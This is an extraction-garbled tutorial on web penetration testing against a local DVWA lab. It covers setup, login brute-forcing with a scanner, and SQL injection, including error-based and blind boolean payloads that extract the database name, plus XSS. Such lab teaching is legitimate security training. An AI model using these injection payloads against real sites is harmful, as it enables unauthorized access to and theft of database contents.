ThePracticeofWebApplicationPenetrationTesting
1.BuildingTestingEnvironment
Intrusionofwebsitesisillegalinmanycountries,soyoucannottakeother’swebsitesasyour
testingtarget.
First,youneedbuildatestenvironmentforyourself.Ifyouarenotgoodatbuildingservers,we
recommendyoubuildasimpleonewithXAMPP.
OS:Windows7,8
Software:XAMPPforWindows,download:https://www.apachefriends.org/zh_cn/index.html
XAMPPforWindowshasmodulessuchasApache,PHP,Tomcat,andMySQLetc.
Thedefaultinstallationpathisc:\xampp,pleasedonotchangeit.
TakeDVWA(DamnVulnerableWebApplication)asanexample,StartApacheandMySQL,and
accesswithhttp://127.0.0.1.
Afterstarted,youcanusethefollowingcommandtosetthepasswordto123456(Thisisaweak
password,justforexample,pleasemodifyit)
C:\xampp\mysql\bin\mysqladmin-urootpassword123456
Now,youcandownloadDVWAfromhttps://github.com/RandomStorm/DVWA,unzipitto
C:\xampp\htdocs\dvwa,
Thenmodifyitsconfigurationfile,whichisC:\xampp\htdocs\dvwa\config\config.inc.php:
$_DVWA[''db_server'']=''localhost'';
$_DVWA[''db_database'']=''dvwa'';
$_DVWA[''db_user'']=''root'';
$_DVWA[''db_password'']=‘123456’;
$_DVWA[''default_security_level'']="low";
Openhttp://127.0.0.1/dvwa/setup.php,
Click”Create/ResetDatabase”tofinishtheinstallation.
Accessthefrontpageofitanditwillredirecttohttp://127.0.0.1/DVWA/login.php
Now,abasictestenvironmentisavailable.
2.DVWABruteForce
ThefirstchallengeofDVWAishowtologinit.Usually,youcansearchthenetworkandgetthe
defaultusername/password,ortrytouseSQLInjectiontoescapetheauthenticationmechanism,
suchasuseausernamelikeadmin’;--orotherways.
Herewewillusebruteforce,anduseWebCruiserWebVulnerabilityScanner3
(http://www.janusec.com/)asabruteforcetool.
First,inputanyusernameandpassword,suchas123,456,etc.submit.
SwitchtoResendtab:
Wefoundtherewasarequestlistwhichincludesrequestswesubmitjustnow.
Notethatthereisabutton“Bruter”,clickit,itwillswitchtoBrutertool.
Theusernameandpasswordfieldhasbeenidentifiedautomatically.
ThedictionaryfilesarelocatedinthesamedirectorywithWebCruiserWVS.exeandsupports
custommodifying.
Click“Go”tostartguessprocess,resultwillbelistinthewindow.
Loginwiththeusernameandpassword.
3.SQLInjection
Select“SQLInjection”menu,input1andsubmit:
Input1’totry:
MySQLthrowexceptionbecauseofunpairedsinglequotes.
Now,wecansuspectthatthereisSQLInjectionvulnerabilityhere.
Continuetry1and1=1and1and1=2
Butwefounditisnotthesameasexpected,SQLInjectionwithintegertypewasruledout.
Continuetrywith1''and''1''=''1and1''and''1''=''2
Thereisnoresultreturntouswhenweinput1’and‘1’=’2
Tillnow,wecanadjudgethereisSQLInjectionvulnerabilitywithstringtypehere.
Recap:
CriterionofSQLInjection
AssumetheinitialresponseisResponse0,
ResponsebyappendtruelogicisResponse1,
ResponsebyappendfalselogicisResponse2,
IfResponse1=Response0,butResponse1!=Response2,SQLInjectionexists.
OK,canyoutakeoversomedatabyexploitingit?
Try:http://127.0.0.1/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1''and(select1from(select
count(),concat((selectdatabase()),0x3a,floor(rand(0)2))xfrominformation_schema.tables
groupbyx)a)%23
Well,thedatabasename“dvwa”returnsonthepage.
Thiscaseisalittlecomplex;actuallyitbuildsanexceptionintentionallybytwicerand
computation.
AnotherwayisblindSQLInjection,byguestthelengthandASCIIofeachbyteofthefield.
Tocomputeifthelengthofdatabasenamebiggerthan10:
http://127.0.0.1/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1''and(select
char_length(database()))>10and''1''=''1
Wrong,trylessthan10:
http://127.0.0.1/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1''and(select
char_length(database()))<10and''1''=''1
Right,continueguesstill:
http://127.0.0.1/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1''and(select
char_length(database()))=4and''1''=''1
Wegotthelengthis4.
Continuetoguesseachbyteofit:
http://127.0.0.1/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1''and(select
ord(substr(database(),1,1)))=100and%271%27=%271
TheASCIIofthefirstbyteis100,itisd,andsoon.
http://127.0.0.1/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1''and(select
ord(substr(database(),2,1)))=118and%271%27=%271,thesecondbyteisv.
http://127.0.0.1/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1''and(select
ord(substr(database(),3,1)))=119and%271%27=%271,thethirdbyteisw.
http://127.0.0.1/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1''and(select
ord(substr(database(),4,1)))=97and%271%27=%271,thefourthbyteisa.
Gotthefullnameofdatabaseis“dvwa”.
Isthereatoolwhichcandothesetestsinstead?
Yes,wecanuseawebapplicationsecurityscannertodoit.
TakeWebCruiserasanillustration,navigatepageandclick“ScanURL”:
SQLInjectionvulnerabilitiesfound.Rightclickvulnerabilityandselect“SQLINJECTIONPOC”,
continueclick”GetEnvironmentInformation”:
4.XSS
SelectXSSfromthemenu,
http://127.0.0.1/dvwa/vulnerabilities/xss_s/
Inputtextandscriptdirectlyinthetitleandcontentfield,suchas:
testinput
Orusescanner,itfound2XSSvulnerabilities.
Note:Inordertoimproveefficiency,WebCruiserWebVulnerabilityScannercanscandesignated
vulnerabilitytype(setting)ordesignatedURL(ScanURLbutton)separately.
|
|
